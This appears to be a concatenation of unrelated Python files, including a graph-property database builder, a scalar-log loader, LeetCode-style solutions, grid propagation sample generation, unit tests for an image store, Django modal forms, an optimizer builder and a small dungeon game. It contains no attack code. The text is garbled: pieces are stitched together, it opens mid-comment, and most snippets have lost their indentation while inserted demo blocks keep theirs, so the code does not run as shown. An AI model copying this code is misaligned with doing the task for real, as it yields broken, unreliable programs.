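# hypothetical placeholders, not part of this module):
def _demo_io_helpers():
    download_file('cora.npz', 'https://example.org/data/cora.npz')
    if files_exist('cora.npz'):
        data = load_npz('cora.npz')
        print(sorted(data.keys()))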
|
from graph_txt_files.txt_functions.graph_calculator import calc
from graph_txt_files.txt_functions.graph_property_names import property_names
import grinpy as gp
import os
import pickle
exceptions = ['randic_index',
'augmented_randic_index',
'harmonic_index',
'atom_bond_connectivity_index',
'sum_connectivity_index',
'min_degree',
'max_degree',
'number_of_min_degree_nodes',
'number_of_max_degree_nodes']
__all__ = ['make_graph_db', 'exceptions']
def make_graph_db(graph_type):
if graph_type == 'cubic':
property_names_valid = [x for x in property_names if x not in exceptions]
else:
property_names_valid = property_names
# portable replacement for parsing `ls` output via os.popen
graphs = sorted(os.listdir('graph_txt_files/graph_txt_folders/' + graph_type))
size = len(graphs)
counter = 1
pickle_dict = dict()
for graph in graphs:
pickle_dict[graph] = dict()
G = gp.read_edgelist('graph_txt_files/graph_txt_folders/'+graph_type+'/'+graph)
for graph_property in property_names_valid:
pickle_dict[graph][graph_property] = calc(G, graph_property)
print('Graph', counter, 'of', size)
counter += 1
with open('graph_data/' + graph_type, 'wb') as pickle_out:
    pickle.dump(pickle_dict, pickle_out)
return None
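# Example invocation (assumes the graph_txt_files/graph_txt_folders/cubic
# input layout used above and a graph_data/ output directory exist on disk):
if __name__ == '__main__':
    make_graph_db('cubic')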
|
import os
import numpy
from typing import Optional
from phi import math
from phi.field import Scene
from phiml.math import shape, wrap, channel, spatial, batch
from phiml.backend import ML_LOGGER
@math.broadcast
def load_scalars(scene: Scene or str,
name: str,
prefix='log_',
suffix='.txt',
x: Optional[str]='steps',
entries_dim=spatial('iteration'),
batch_dim=batch('batch')):
"""
Read one or a `Tensor` of scalar logs as curves.
Args:
scene: `Scene` or `str`. Directory containing the log files.
name: Log file base name.
prefix: Log file prefix.
suffix: Log file suffix.
x: 'steps' or 'time'.
entries_dim: Curve dimension.
batch_dim: Dimension along which multiple logged columns are stacked.
Returns:
`Tensor` containing `entries_dim` and `vector`.
"""
assert x in (None, 'steps', 'time')
if isinstance(scene, str):
scene = Scene.at(scene)
assert isinstance(scene, Scene), f"scene must be a Scene or str but got {type(scene)}"
assert shape(scene).rank == 0, f"Use math.map(load_scalars, ...) to load data from multiple scenes"
ML_LOGGER.debug(f"Reading {os.path.join(scene.path, f'{prefix}{name}{suffix}')}")
curve = numpy.loadtxt(os.path.join(scene.path, f"{prefix}{name}{suffix}"))
if curve.ndim == 2:
x_values = curve[:, 0]
values = curve[:, 1:]
elif curve.ndim == 1 and numpy.floor(curve[0]) == curve[0]: # new format but only one entry
x_values = curve[None, 0]
values = curve[None, 1:]
else:
values = curve[:, None]
x_values = numpy.arange(len(values))
if x == 'time':
    ML_LOGGER.debug(f"Reading {os.path.join(scene.path, 'log_step_time.txt')}")
    _, x_values, *_ = numpy.loadtxt(os.path.join(scene.path, "log_step_time.txt")).T
    values = values[:len(x_values) + 1]
    x_values = numpy.cumsum(x_values[:len(values) - 1])
    x_values = numpy.concatenate([[0.], x_values])
x_values = wrap(x_values, entries_dim)
values = wrap(values, entries_dim, batch_dim)
if x is not None:
return math.stack([x_values, values], channel(vector=[x, name]))
return values
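# Minimal usage sketch (the scene directory name is a hypothetical
# placeholder): reads log_loss.txt from the scene and returns a curve
# tensor with steps and values stacked on the vector dimension.
def _demo_load_scalars():
    curve = load_scalars('sim_000000', 'loss')
    print(curve)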
|
from typing import List

class Solution:
    def maxProfit(self, prices: List[int]) -> int:
memo = {}
def act(i, buy):
if i >= len(prices):
return 0
if (i, buy) in memo:
return memo[(i, buy)]
if buy:
memo[(i, buy)] = max(act(i+1, False)-prices[i], act(i+1, True))
else:
memo[(i, buy)] = max(act(i+2, True)+prices[i], act(i+1, False))
return memo[(i, buy)]
res = act(0, True)
return res
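# Quick check: the memoized recursion above matches the "buy and sell with
# cooldown" variant (a sell advances i by 2). For [1, 2, 3, 0, 2]:
# buy@1, sell@3, cool down, buy@0, sell@2 -> profit 3.
if __name__ == '__main__':
    print(Solution().maxProfit([1, 2, 3, 0, 2]))  # expected: 3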
|
import numpy as np
import torch
import scipy.io as sio
from generate_environment import environment
import argparse
#### Samples for training propagation with changing source pixels
# Note: there are two versions
def generateSamples(N, numTraining, steps):
# Parameters for environment generation
N2 = N**2
p = 0.15
# Set up the arrays that store the samples
trainEnv = np.zeros((numTraining, N2))
trainPred = np.zeros((numTraining, N2))
trainPredRange = np.zeros((numTraining, N2))
runMax = np.ceil(numTraining*0.55)
hideMax = np.ceil(numTraining*0.55)
j = 0
while(j < numTraining):
X, prey, predator, cave = environment(N, p)
# Label is 0 if cave is closer to prey (also equivalent to non-accessible to predator)
# Label is 1 if cave is closer to predator OR non-accessible to either
# These form the two different stopping conditions
# Diff tracks when we've filled the whole space
# Stop tracks when one of the ranges includes the cave
# Label get set initially to 1, the proper value if the cave is in neither range
# Set up predator range
predatorRange = np.zeros((N,N))
row_predator, col_predator = np.nonzero(predator)
l = len(row_predator)
rowNext_predator = []
colNext_predator = []
for i in range(0, l):
predatorRange[row_predator[i], col_predator[i]] = 1
rowNext_predator.append(row_predator[i])
colNext_predator.append(col_predator[i])
row_predator = []
col_predator = []
q = 0
while(q < steps):
# Propagate predator
predatorRange_Old = predatorRange[:,:]
del row_predator[:]
del col_predator[:]
row_predator = rowNext_predator[:]
col_predator = colNext_predator[:]
l = len(row_predator)
del rowNext_predator[:]
del colNext_predator[:]
for i in range(0, l):
row_current = row_predator[i]
col_current = col_predator[i]
if ((row_current != 0) and (X[(row_current - 1), col_current] == 0) and (predatorRange[(row_current - 1), col_current] == 0)):
predatorRange[row_current - 1, col_current] = 1
rowNext_predator.append(row_current - 1)
colNext_predator.append(col_current)
if ((row_current != N-1) and (X[row_current + 1, col_current] == 0) and (predatorRange[(row_current + 1), col_current] == 0)):
predatorRange[row_current + 1, col_current] = 1
rowNext_predator.append(row_current + 1)
colNext_predator.append(col_current)
if ((col_current != 0) and (X[row_current, col_current-1] == 0) and (predatorRange[row_current, col_current-1] == 0)):
predatorRange[row_current, col_current-1] = 1
rowNext_predator.append(row_current)
colNext_predator.append(col_current-1)
if ((col_current != N-1) and (X[row_current, col_current+1] == 0) and (predatorRange[row_current, col_current+1] == 0)):
predatorRange[row_current, col_current+1] = 1
rowNext_predator.append(row_current)
colNext_predator.append(col_current+1)
q = q+1
#print(q)
# Change everything to +1/-1
Xvec = np.reshape(X, (1, N2))
Xvec = 1 - Xvec
Xvec[Xvec == 0] = -1
predVec = np.reshape(predator, (1, N2))
predVec[predVec == 0] = -1
predRangeVec = np.reshape(predatorRange, (1, N2))
predRangeVec[predRangeVec == 0] = -1
trainEnv[j, :] = Xvec
trainPred[j, :] = predVec
trainPredRange[j, :] = predRangeVec
j = j+1
# if (j % 1000 == 0):
# print(j)
# Once all the samples are generated, return dictionary of samples
trainEnv = torch.from_numpy(trainEnv)
trainPred = torch.from_numpy(trainPred)
trainPredRange = torch.from_numpy(trainPredRange)
sampleDict = {"Environment": trainEnv, "Predator": trainPred, "Range": trainPredRange}
return sampleDict
# # Look at the output
# fig1, ax = plt.subplots(2, 3)
# ax[0, 0].imshow(X, cmap='Greys', interpolation='none')
# ax[0, 1].imshow(prey, cmap='Greys', interpolation='none')
# ax[0, 2].imshow(predator, cmap='Greys', interpolation='none')
# ax[1, 0].imshow(cave, cmap='Greys', interpolation='none')
# ax[1, 1].imshow(preyRange, cmap='Greys', interpolation='none')
# ax[1, 2].imshow(predatorRange, cmap='Greys', interpolation='none')
# print(label)
# plt.show()
# fig1.savefig('sample_label.pdf', bbox_inches = 'tight')
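# Example: generate 4 samples on a 10x10 grid with 3 propagation steps
# (illustrative; requires generate_environment.environment to be importable):
if __name__ == '__main__':
    samples = generateSamples(10, 4, 3)
    print(samples['Environment'].shape)  # torch.Size([4, 100])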
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# @param A : head node of linked list
# @return the head node in the linked list
def swapPairs(self, A):
if not A or not A.next:
return A
head = A.next
A.next = A.next.next
head.next = A
current = A
while current.next and current.next.next:
temp = current.next.next.next
current.next, current.next.next = current.next.next, current.next
current.next.next.next = temp
current = current.next.next
return head
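# Quick demonstration (ListNode defined locally for the sketch, matching the
# commented definition above); a 1->2->3->4 list becomes 2->1->4->3:
if __name__ == '__main__':
    class ListNode:
        def __init__(self, x):
            self.val = x
            self.next = None

    head = ListNode(1)
    head.next = ListNode(2)
    head.next.next = ListNode(3)
    head.next.next.next = ListNode(4)
    node = Solution().swapPairs(head)
    while node:
        print(node.val, end=' ')  # 2 1 4 3
        node = node.next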
|
#Author: James Nicholson
#Date: 5/30/2018
#Ask the user for a number.
# Depending on whether the number is even or odd,
# print out an appropriate message to the user.
num = int(input("Enter a number: "))
mod = num % 2
if mod > 0:
print("Number is odd.")
else:
print("Number is even")
#End Script
|
import unittest
import testutil
import shutil
import os
import hdbfs.ark
import hdbfs.imgdb
PRI_THUMB = 1000
PRI_DATA = 2000
class ImgDbCases( testutil.TestCase ):
def setUp( self ):
self.init_env()
data_config = hdbfs.imgdb.ImageDbDataConfig( self.db_path )
self.idb = hdbfs.ark.StreamDatabase( data_config )
def tearDown( self ):
self.uninit_env()
def test_imgdat_structure( self ):
red = self._load_data( self.red )
green = self._load_data( self.green )
self.idb.load_data( red, 0x123, PRI_DATA, 'png' )
self.idb.load_data( green, 0xabc, PRI_DATA, 'dat' )
# Should not be moved before commit
self.assertTrue( os.path.exists( red ),
'Image moved before commit' )
self.idb.commit()
self.assertFalse( os.path.exists( red ),
'Old image was not removed' )
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'imgdat/000/000' ) ),
'Image data directory not created' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000123.png' ) ),
'Image file moved to incorrect location' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000abc.dat' ) ),
'Image file moved to incorrect location' )
red_fd = self.idb.read( 0x123, PRI_DATA, 'png' )
self.assertTrue( self._diff_data( red_fd, self.red ),
'Image not read properly from library' )
uk_fd = self.idb.read( 0xabc, PRI_DATA, 'png' )
self.assertTrue( uk_fd is None,
'Missing file somehow read from library' )
def test_tbdat_structure( self ):
red = self._load_data( self.red )
self.idb.load_data( red, 0x123, PRI_THUMB, 'png' )
# Should not be moved before commit
self.assertTrue( os.path.exists( red ),
'Image moved before commit' )
self.idb.commit()
self.assertFalse( os.path.exists( red ),
'Old image was not removed' )
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'tbdat/000/000' ) ),
'Image data directory not created' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000123.png' ) ),
'Image file moved to incorrect location' )
red_fd = self.idb.read( 0x123, PRI_THUMB, 'png' )
self.assertTrue( self._diff_data( red_fd, self.red ),
'Image not read properly from library' )
uk_fd = self.idb.read( 0xabc, PRI_THUMB, 'png' )
self.assertTrue( uk_fd is None,
'Missing file somehow read from library' )
def test_multiple_folders( self ):
red = self._load_data( self.red )
yellow = self._load_data( self.yellow )
green = self._load_data( self.green )
cyan = self._load_data( self.cyan )
blue = self._load_data( self.blue )
magenta = self._load_data( self.magenta )
self.idb.load_data( red, 0x123, PRI_DATA, 'png' )
self.idb.load_data( yellow, 0xabc, PRI_THUMB, 'png' )
self.idb.load_data( green, 0xdef, PRI_DATA, 'png' )
self.idb.load_data( cyan, 0x123abc, PRI_DATA, 'png' )
self.idb.load_data( blue, 0xabc123abc, PRI_THUMB, 'png' )
self.idb.load_data( magenta, 0xabc123def, PRI_DATA, 'png' )
self.idb.commit()
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'imgdat/000/000' ) ),
'Image data directory 000 not created' )
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'tbdat/000/000' ) ),
'Thumb data directory 000 not created' )
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'imgdat/000/123' ) ),
'Image data directory 123 not created' )
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'imgdat/abc/123' ) ),
'Image data directory abc/123 not created' )
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'tbdat/abc/123' ) ),
'Thumb data directory abc/123 not created' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000123.png' ) ),
'Image file 123 moved to incorrect location' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000abc.png' ) ),
'Image file abc moved to incorrect location' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000def.png' ) ),
'Image file def moved to incorrect location' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/123/0000000000123abc.png' ) ),
'Image file 123abc moved to incorrect location' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/abc/123/0000000abc123abc.png' ) ),
'Image file abc123abc moved to incorrect location' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/abc/123/0000000abc123def.png' ) ),
'Image file abc123def moved to incorrect location' )
red_fd = self.idb.read( 0x123, PRI_DATA, 'png' )
self.assertTrue( self._diff_data( red_fd, self.red ),
'Image 123 not read properly from library' )
yellow_fd = self.idb.read( 0xabc, PRI_THUMB, 'png' )
self.assertTrue( self._diff_data( yellow_fd, self.yellow ),
'Image not read properly from library' )
green_fd = self.idb.read( 0xdef, PRI_DATA, 'png' )
self.assertTrue( self._diff_data( green_fd, self.green ),
'Image not read properly from library' )
cyan_fd = self.idb.read( 0x123abc, PRI_DATA, 'png' )
self.assertTrue( self._diff_data( cyan_fd, self.cyan ),
'Image not read properly from library' )
blue_fd = self.idb.read( 0xabc123abc, PRI_THUMB, 'png' )
self.assertTrue( self._diff_data( blue_fd, self.blue ),
'Image not read properly from library' )
magenta_fd = self.idb.read( 0xabc123def, PRI_DATA, 'png' )
self.assertTrue( self._diff_data( magenta_fd, self.magenta ),
'Image not read properly from library' )
def test_commit_and_rollback( self ):
# State should be clean on start-up
self.assertEqual( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
self.idb.load_data( red, 0x123, PRI_DATA, 'png' )
self.assertEqual( self.idb.get_state(), 'dirty',
'Database not dirty after load' )
# Should not be moved before commit
self.assertTrue( os.path.exists( red ),
'Image moved before commit' )
self.idb.prepare_commit()
self.assertFalse( os.path.exists( red ),
'Image not moved after prepare' )
self.assertEqual( self.idb.get_state(), 'prepared',
'Database not prepared after prepare' )
self.idb.unprepare_commit()
self.assertTrue( os.path.exists( red ),
'Image not returned after unprepare' )
self.assertEqual( self.idb.get_state(), 'dirty',
'Database not clean after unprepare' )
self.idb.prepare_commit()
self.assertFalse( os.path.exists( red ),
'Image not moved after prepare/unprepare/prepare' )
self.assertEqual( self.idb.get_state(), 'prepared',
'Database not prepared after prepare/unprepare/prepare' )
def test_hard_single_vol( self ):
# State should be clean on start-up
self.assertEqual( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
yellow = self._load_data( self.yellow )
green = self._load_data( self.green )
self.idb.load_data( red, 0x1, PRI_DATA, 'png' )
self.idb.commit()
self.idb.load_data( yellow, 0x2, PRI_THUMB, 'png' )
self.idb.prepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000001.png' ) ),
'File 0x1 missing' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000002.png' ) ),
'File 0x2 missing' )
self.idb.unprepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000001.png' ) ),
'File 0x1 missing after rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000002.png' ) ),
'File 0x2 present when should have been removed' )
self.idb.load_data( green, 0x3, PRI_DATA, 'png' )
self.idb.prepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000001.png' ) ),
'File 0x1 missing after 3rd commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000002.png' ) ),
'File 0x2 not re-instated after 3rd commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000003.png' ) ),
'File 0x3 not added by 3rd commit' )
self.idb.rollback()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000001.png' ) ),
'File 0x1 missing after 2nd rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000002.png' ) ),
'File 0x2 not removed by 2nd rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000003.png' ) ),
'File 0x3 not removed by 2nd rollback' )
self.assertEqual( self.idb.get_state(), 'clean',
'Reset state did not reset state to clean' )
self.idb.load_data( green, 0x3, PRI_DATA, 'png' )
self.idb.commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000001.png' ) ),
'File 0x1 missing after 4th commit' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000002.png' ) ),
'File 0x2 brought back after reset and commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000003.png' ) ),
'File 0x3 not re-added by 4th commit' )
def test_hard_multi_vol( self ):
# State should be clean on start-up
self.assertEqual( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
yellow = self._load_data( self.yellow )
green = self._load_data( self.green )
self.idb.load_data( red, 0x1001, PRI_DATA, 'png' )
self.idb.commit()
self.idb.load_data( yellow, 0x2001, PRI_DATA, 'png' )
self.idb.prepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/002/0000000000002001.png' ) ),
'File 0x2001 missing' )
self.idb.unprepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/002/0000000000002001.png' ) ),
'File 0x2001 present when should have been removed' )
self.idb.load_data( green, 0x3001, PRI_DATA, 'png' )
self.idb.prepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after 3rd commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/002/0000000000002001.png' ) ),
'File 0x2001 not re-instated after 3rd commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/003/0000000000003001.png' ) ),
'File 0x3001 not added by 3rd commit' )
self.idb.rollback()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after 2nd rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/002/0000000000002001.png' ) ),
'File 0x2001 not removed by 2nd rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/003/0000000000003001.png' ) ),
'File 0x3001 not removed by 2nd rollback' )
self.assertEqual( self.idb.get_state(), 'clean',
'Reset state did not reset state to clean' )
self.idb.load_data( green, 0x3001, PRI_DATA, 'png' )
self.idb.commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after 4th commit' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/002/0000000000002001.png' ) ),
'File 0x2001 brought back after reset and commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/003/0000000000003001.png' ) ),
'File 0x3001 not re-added by 4th commit' )
def test_hard_multi_pri( self ):
# State should be clean on start-up
self.assertEqual( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
yellow = self._load_data( self.yellow )
green = self._load_data( self.green )
self.idb.load_data( red, 0x1001, PRI_DATA, 'png' )
self.idb.commit()
self.idb.load_data( yellow, 0x1002, PRI_THUMB, 'png' )
self.idb.prepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/001/0000000000001002.png' ) ),
'File 0x1002 missing' )
self.idb.unprepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/001/0000000000001002.png' ) ),
'File 0x1002 present when should have been removed' )
self.idb.load_data( green, 0x3001, PRI_DATA, 'png' )
self.idb.prepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after 3rd commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/001/0000000000001002.png' ) ),
'File 0x1002 not re-instated after 3rd commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/003/0000000000003001.png' ) ),
'File 0x3001 not added by 3rd commit' )
self.idb.rollback()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after 2nd rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/001/0000000000001002.png' ) ),
'File 0x1002 not removed by 2nd rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/003/0000000000003001.png' ) ),
'File 0x3001 not removed by 2nd rollback' )
self.assertEqual( self.idb.get_state(), 'clean',
'Reset state did not reset state to clean' )
self.idb.load_data( green, 0x3001, PRI_DATA, 'png' )
self.idb.commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after 4th commit' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/001/0000000000001002.png' ) ),
'File 0x2001 brought back after reset and commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/003/0000000000003001.png' ) ),
'File 0x3001 not re-added by 4th commit' )
def test_rollback_then_commit( self ):
self.assertEqual( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
self.idb.load_data( red, 0x123, PRI_DATA, 'png' )
self.assertEqual( self.idb.get_state(), 'dirty',
'Database not dirty after load' )
self.assertTrue( os.path.exists( red ),
'Image moved before commit' )
self.idb.rollback()
self.assertTrue( os.path.exists( red ),
'Image moved after no-commit-rollback' )
self.assertEqual( self.idb.get_state(), 'clean',
'Database not clean after rollback' )
self.idb.commit()
self.assertTrue( os.path.exists( red ),
'Image moved after rollback before commit' )
self.assertEqual( self.idb.get_state(), 'clean',
'Database not clean after rollback then commit' )
def test_commit_failure( self ):
self.assertEqual( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
self.idb.load_data( red, 0x123, PRI_DATA, 'png' )
os.remove( red )
try:
self.idb.commit()
self.fail( 'Commit succeeded on missing file' )
except:
pass
self.assertEqual( self.idb.get_state(), 'dirty',
'Database not dirty after failed commit' )
def test_commit_failure_rollback_single_volume( self ):
self.assertEqual( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
yellow = self._load_data( self.yellow )
green = self._load_data( self.green )
self.idb.load_data( red, 0x1, PRI_DATA, 'png' )
self.idb.load_data( yellow, 0x2, PRI_DATA, 'png' )
self.idb.load_data( green, 0x3, PRI_DATA, 'png' )
os.remove( yellow )
try:
self.idb.commit()
self.fail( 'Commit succeeded on missing file' )
except:
pass
self.assertTrue( os.path.exists( red ),
'File 0x1 not rolled back on failed commit' )
self.assertTrue( os.path.exists( green ),
'File 0x3 not rolled back on failed commit' )
def test_commit_failure_rollback_multi_volume( self ):
self.assertEqual( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
yellow = self._load_data( self.yellow )
green = self._load_data( self.green )
self.idb.load_data( red, 0x1001, PRI_DATA, 'png' )
self.idb.load_data( yellow, 0x2001, PRI_DATA, 'png' )
self.idb.load_data( green, 0x3001, PRI_DATA, 'png' )
os.remove( yellow )
try:
self.idb.commit()
self.fail( 'Commit succeeded on missing file' )
except:
pass
self.assertTrue( os.path.exists( red ),
'File 0x1001 not rolled back on failed commit' )
self.assertTrue( os.path.exists( green ),
'File 0x3001 not rolled back on failed commit' )
def test_delete( self ):
# State should be clean on start-up
self.assertEqual( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
green = self._load_data( self.green )
self.idb.load_data( red, 0x123, PRI_DATA, 'png' )
self.idb.load_data( green, 0xabc, PRI_THUMB, 'png' )
self.idb.commit()
self.idb.delete( 0x123, PRI_DATA, 'png' )
self.idb.delete( 0xabc, PRI_THUMB, 'png' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000123.png' ) ),
'Image file removed before commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000abc.png' ) ),
'Thumb file removed before commit' )
self.idb.prepare_commit()
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000123.png' ) ),
'Image file delete failed' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000abc.png' ) ),
'Image file delete failed' )
self.idb.rollback()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000123.png' ) ),
'Image file rollback from delete failed' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000abc.png' ) ),
'Image file rollback from delete failed' )
if( __name__ == '__main__' ):
unittest.main()
|
from django import forms
from lib.bootstrap_modal_forms.mixins import PopRequestMixin, CreateUpdateAjaxMixin
class BSModalForm(PopRequestMixin, forms.Form):
pass
class BSModalModelForm(PopRequestMixin, CreateUpdateAjaxMixin, forms.ModelForm):
pass
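# Hypothetical usage (the Book model is a placeholder, not part of this
# module): forms rendered inside bootstrap modals subclass these bases so
# they receive the request via PopRequestMixin and defer saving to the
# AJAX mixin.
#
#   class BookModelForm(BSModalModelForm):
#       class Meta:
#           model = Book
#           fields = ['title', 'author']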
|
# encoding: utf-8
"""
@author: liaoxingyu
@contact: sherlockliao01@gmail.com
"""
from . import lr_scheduler
from . import optim
def build_optimizer(cfg, model):
params = []
for key, value in model.named_parameters():
if not value.requires_grad:
continue
lr = cfg.SOLVER.BASE_LR
weight_decay = cfg.SOLVER.WEIGHT_DECAY
if "heads" in key:
lr *= cfg.SOLVER.HEADS_LR_FACTOR
if "bias" in key:
lr *= cfg.SOLVER.BIAS_LR_FACTOR
weight_decay = cfg.SOLVER.WEIGHT_DECAY_BIAS
params += [{"params": [value], "lr": lr, "weight_decay": weight_decay}]
solver_opt = cfg.SOLVER.OPT
if hasattr(optim, solver_opt):
if solver_opt == "SGD":
opt_fns = getattr(optim, solver_opt)(params, momentum=cfg.SOLVER.MOMENTUM)
else:
opt_fns = getattr(optim, solver_opt)(params)
else:
raise NameError("optimizer {} not supported".format(cfg.SOLVER.OPT))
return opt_fns
def build_lr_scheduler(cfg, optimizer):
if cfg.SOLVER.SCHED == "warmup":
return lr_scheduler.WarmupMultiStepLR(
optimizer,
cfg.SOLVER.STEPS,
cfg.SOLVER.GAMMA,
warmup_factor=cfg.SOLVER.WARMUP_FACTOR,
warmup_iters=cfg.SOLVER.WARMUP_ITERS,
warmup_method=cfg.SOLVER.WARMUP_METHOD
)
elif cfg.SOLVER.SCHED == "delay":
return lr_scheduler.DelayedCosineAnnealingLR(
optimizer,
cfg.SOLVER.DELAY_ITERS,
cfg.SOLVER.COS_ANNEAL_ITERS,
warmup_factor=cfg.SOLVER.WARMUP_FACTOR,
warmup_iters=cfg.SOLVER.WARMUP_ITERS,
warmup_method=cfg.SOLVER.WARMUP_METHOD
)
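# Sketch of the cfg fields consumed above (names taken from this module;
# the values shown are illustrative only):
#
#   cfg.SOLVER.OPT = 'SGD'
#   cfg.SOLVER.BASE_LR = 0.01
#   cfg.SOLVER.MOMENTUM = 0.9
#   cfg.SOLVER.WEIGHT_DECAY = 5e-4
#   cfg.SOLVER.WEIGHT_DECAY_BIAS = 0.0
#   cfg.SOLVER.BIAS_LR_FACTOR = 2.0
#   cfg.SOLVER.HEADS_LR_FACTOR = 1.0
#   opt = build_optimizer(cfg, model)
#   scheduler = build_lr_scheduler(cfg, opt)  # with cfg.SOLVER.SCHED = 'warmup'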
|
# movement can cause death
# Dungeon V 1
import time
import random
import YesNo
import upDownLeftRight
import loading
import runDirection
def Enter():
if YesNo.yesNo('Would you like to enter the dungeon?'):
for i in range(101):
print('Loading dungeonV01...', i, '%', sep='', end='\r', flush=True)
time.sleep((random.randint(1, 7)) / 50)
print('\n', end='')
if loading.loading('true', 1):
for i in 'Which direction would you like to go?':
time.sleep(0.05)
print(i, end='', flush=True)
# Ask once, store the heading, and compare with == (the original used
# `is`, which tests identity, not equality, and is unreliable for ints;
# it also re-prompted for every direction)
direction = upDownLeftRight.upDownLeftRight('')
if direction == 90:  # up
    if runDirection.up() is False:
        exit()
if direction == 270:  # down
    if runDirection.down() is False:
        pass
